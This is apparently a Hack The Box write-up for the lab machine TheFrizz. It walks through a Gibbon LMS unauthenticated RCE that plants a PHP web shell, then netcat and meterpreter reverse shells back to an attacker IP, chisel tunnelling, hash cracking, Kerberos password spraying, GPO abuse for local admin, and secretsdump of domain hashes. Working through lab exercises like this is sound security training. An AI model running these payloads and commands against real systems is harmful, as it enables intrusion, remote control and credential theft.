Hack The Box / WINDOWS / 2026-03-18
Hack The Box — TheFrizz (Windows)
Gibbon v25.0.00 unauthenticated RCE gives web access, database hash cracking leads to domain credentials, Kerberos SSH access exposes recoverable artifacts, and GPO abuse grants local admin rights for full compromise.
Target
- IP:
10.129.197.98
Recon
sudo nmap -sC -sV 10.129.197.98 -p- -T5 -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-17 01:28:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
61628/tcp open msrpc Microsoft Windows RPC
65180/tcp open msrpc Microsoft Windows RPC
65189/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-03-17T01:28:50
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 1d06h05m16s
Browse to http://10.129.197.98.
It redirects to http://frizzdc.frizz.htb/home/, so add frizzdc.frizz.htb to /etc/hosts.
The site contains courses. Clicking staff login redirects to:
http://frizzdc.frizz.htb/Gibbon-LMS/
This is Gibbon:
https://gibbonedu.org/
At http://frizzdc.frizz.htb/Gibbon-LMS/ we see:
*NOTICE** Due to unplanned Pentesting by students, WES is migrating applications and tools to stronger security protocols. During this transition, Ms. Fiona Frizzle will be migrating Gibbon to utilize our Azure Active Directory SSO. Please note this might take 48 hours where your accounts will not be available. Please bear with us, and thank you for your patience. Anything that can not utilize Azure AD will use the strongest available protocols such as Kerberos.
Also:
Powered by Gibbon v25.0.00
Useful references:
https://vulmon.com/searchpage?q=Gibbonedu%20Gibbonhttps://vulmon.com/vulnerabilitydetails?qid=CVE-2023-45878https://herolab.usd.de/security-advisories/usd-2023-0025/
Initial Access (Gibbon RCE)
Run:
curl -X POST 'http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php' -d 'img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8%2b&path=asdf.php&gibbonPersonID=0000000001'
The payload decodes to:
<?php echo system($_GET['cmd'])?>
Browse:
http://frizzdc.frizz.htb/Gibbon-LMS/asdf.php?cmd=whoami
Output:
frizz\w.webservice frizz\w.webservice
Check working directory:
http://frizzdc.frizz.htb/Gibbon-LMS/asdf.php?cmd=cd
Output:
C:\xampp\htdocs\Gibbon-LMS C:\xampp\htdocs\Gibbon-LMS
We can get a reverse shell.
Download nc64.exe:
https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
wget https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
Host the file locally:
python3 -m http.server 8000
Use the web shell to download it on target:
http://frizzdc.frizz.htb/Gibbon-LMS/asdf.php?cmd=curl%20http://10.10.16.30:8000/nc64.exe%20-o%20%22C:%5Cxampp%5Chtdocs%5Cnc64.exe%22
The encoded part corresponds to:
curl http://10.10.16.30:8000/nc64.exe -o "C:\xampp\htdocs\nc64.exe"
Listen:
rlwrap nc -vlnp 4444
Trigger reverse shell:
http://frizzdc.frizz.htb/Gibbon-LMS/asdf.php?cmd=C:%5Cxampp%5Chtdocs%5Cnc64.exe%20-e%20cmd.exe%2010.10.16.30%204444
Payload decoded:
C:\xampp\htdocs\nc64.exe -e cmd.exe 10.10.16.30 4444
We get a reverse shell.
Database Credentials and Hash Cracking
Read config:
type config.php
We find:
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
Download chisel (Linux and Windows):
https://github.com/jpillora/chisel
Upload Windows chisel to target.
Attacker:
./chisel_linux server --reverse --port 5555
Target:
.\chisel_windows.exe client http://10.10.16.30:5555 R:3306
Now connect to MySQL:
mysql -h 127.0.0.1 -u MrGibbonsDB --skip_ssl -p
Enter password MisterGibbs!Parrot!?1.
show databases;
+--------------------+
| Database |
+--------------------+
| gibbon |
| information_schema |
| test |
+--------------------+
use gibbon;
show tables;
select * from gibbonperson;
We get:
Email: f.frizzle@frizz.htb
Username: f.frizzle
Password (hashed): 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03
Salt: /aACFhikmNopqrRTVz2489
Create hash file:
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
Crack:
./hashcat-6.2.6/hashcat.bin -a 0 -m 1420 ./hash ./rockyou.txt
Result:
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
Validate with LDAP:
ldapsearch -x -H ldap://10.129.184.216 -D 'f.frizzle@frizz.htb' -w 'Jenni_Luvs_Magic23' -b 'CN=Users,DC=frizz,DC=htb'
It works.
AD Enumeration and Kerberos Access
Sync time:
sudo ntpdate frizzdc.frizz.htb
Collect BloodHound with Kerberos:
bloodhound-python --auth-method kerberos -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' -ns 10.129.184.216 -d 'frizz.htb' -dc 'frizzdc.frizz.htb' -c All --zip
Start and load BloodHound:
sudo neo4j console
bloodhound --no-sandbox
Load the zip and check:
- Analysis -> shortest path to high value targets
f.frizzle has CanPSRemote to frizzdc.frizz.htb.
Try WinRM:
evil-winrm -i frizzdc.frizz.htb -u 'f.frizzle@frizz.htb' -p 'Jenni_Luvs_Magic23'
It does not work.
Request TGT:
getTGT.py 'frizz.htb'/'f.frizzle':'Jenni_Luvs_Magic23' -dc-ip 10.129.184.216
[*] Saving ticket in f.frizzle.ccache
```bash
export KRB5CCNAME=f.frizzle.ccache
Edit /etc/krb5.conf:
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
}
Try again:
evil-winrm -i frizzdc.frizz.htb -u f.frizzle -r frizz.htb
Still fails.
Log in to Gibbon with:
f.frizzle@frizz.htb:Jenni_Luvs_Magic23
In messages we find:
!!!Reminder From IT!!!
Reminder that TODAY is the migration date for our server access methods. Most workflows using PowerShell will not notice a difference (Enter-PSSession). If you do have a problem, please reach out to Fiona or Marvin between 8am and 4pm to install the pre-requisite SSH client on your Mac or Windows laptop.
Request TGT if needed:
getTGT.py 'frizz.htb'/'f.frizzle':'Jenni_Luvs_Magic23' -dc-ip 10.129.184.216
[*] Saving ticket in f.frizzle.ccache
export KRB5CCNAME=f.frizzle.ccache
Connect with SSH:
ssh f.frizzle@frizz.htb
We get a PowerShell session.
Check privileges:
whoami /all
User Name SID
=============== ==============================================
frizz\f.frizzle S-1-5-21-2386970044-1145388522-2932701813-1103
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Loot in Recycle Bin and Lateral Movement
Inspect recycle bin:
cd 'C:\$RECYCLE.BIN'
ls -hidden
d--hs 10/29/2024 7:31 AM S-1-5-21-2386970044-1145388522-2932701813-1103
cd S-1-5-21-2386970044-1145388522-2932701813-1103
ls
-a--- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a--- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
To transfer files conveniently, use meterpreter.
Generate payload:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.252 LPORT=4444 -f exe -o reverse.exe
Upload reverse.exe to target.
Start handler:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
exploit
Run reverse.exe on target, then in meterpreter:
cd 'C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103'
download '$IE2XMEG.7z'
download '$RE2XMEG.7z'
Extract on attacker:
7z x '$RE2XMEG.7z'
We get folder wapt.
Read config:
cd wapt/conf
cat waptserver.ini
Contains:
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
Decode:
echo -n 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d
!suBcig@MehTed!R
Generate usernames via RID brute:
nxc smb frizzdc.frizz.htb -d frizz.htb -k --use-kcache --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users_2.txt
Password spray with kerbrute:
https://github.com/ropnop/kerbrute
./kerbrute --dc frizzdc.frizz.htb -d frizz.htb -v passwordspray users_2.txt '!suBcig@MehTed!R'
Output:
2025/03/19 06:12:35 > [+] VALID LOGIN: M.SchoolBus@frizz.htb:!suBcig@MehTed!R
Request TGT:
getTGT.py 'frizz.htb'/'M.SchoolBus':'!suBcig@MehTed!R' -dc-ip 10.129.239.254
[*] Saving ticket in M.SchoolBus.ccache
export KRB5CCNAME=M.SchoolBus.ccache
SSH as M.SchoolBus:
ssh M.SchoolBus@frizz.htb
We get a PowerShell shell.
From BloodHound:
M.SchoolBusis inDesktop AdminsDesktop Adminsis inGroup Policy Creator OwnersGroup Policy Creator Ownersis inDenied RODC Password Replication Group
Privilege Escalation via GPO Abuse
Upload tools:
SharpGPOAbuse.exe(https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpGPOAbuse.exe)SharpView.exe(https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpView.exe)
Enumerate GPOs:
.\SharpView.exe Get-DomainGPO
Alternative with PowerView:
https://github.com/PowerShellMafia/PowerSploit/raw/master/Recon/PowerView.ps1
. .\PowerView.ps1
Get-DomainGPO | select displayname
displayname
-----------
Default Domain Policy
Default Domain Controllers Policy
New-GPO 'test'
Get-DomainGPO | select displayname
Now test is visible.
Check OUs:
Get-ADOrganizationalUnit -Filter *
City :
Country :
DistinguishedName : OU=Domain Controllers,DC=frizz,DC=htb
LinkedGroupPolicyObjects : {CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=frizz,DC=htb}
ManagedBy :
Name : Domain Controllers
ObjectClass : organizationalUnit
ObjectGUID : b6aa26d6-58bd-45cb-9dc4-982c468a61d7
PostalCode :
State :
StreetAddress :
City :
Country :
DistinguishedName : OU=Class_Frizz,DC=frizz,DC=htb
LinkedGroupPolicyObjects : {}
ManagedBy :
Name : Class_Frizz
ObjectClass : organizationalUnit
ObjectGUID : 7b6c87c2-4966-4024-abee-3c45dad1871a
PostalCode :
State :
StreetAddress :
Link GPO:
New-GPLink -Name "test" -Target "OU=Domain Controllers,DC=frizz,DC=htb" -LinkEnabled Yes -Enforced Yes
Abuse GPO:
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount 'M.SchoolBus' --GPOName 'test'
gpupdate /Force
net user M.SchoolBus
We observe:
Local Group Memberships *Administrators *Remote Management Use
SSH login as M.SchoolBus now fails.
Get reverse shell instead.
Listen:
nc -vlnp 4444
Upload RunasCs:
https://github.com/antonioCoco/RunasCs
Run:
.\RunasCs.exe 'M.SchoolBus' '!suBcig@MehTed!R' "C:\tmp\nc64.exe -e cmd.exe 10.10.14.252 4444"
We get a reverse shell.
Verify:
whoami /all
We are administrators and can read root flag:
C:\Administrator\Desktop\root.txt
If we want Administrator hashes:
secretsdump.py -k 'frizz.htb'/'M.SchoolBus':'!suBcig@MehTed!R'@'frizzdc.frizz.htb'
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c299f8b2acc2da429d3a35953b3854d7:::
[*] _SC_Apache2.4
w.webservice@frizz.htb:BananaB0at!!@
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c457b5f1c315bef53b9cabc92e993d0b:::
Request Administrator TGT:
getTGT.py 'frizz.htb'/'Administrator' -hashes ':c457b5f1c315bef53b9cabc92e993d0b' -dc-ip 10.129.239.254
[*] Saving ticket in Administrator.ccache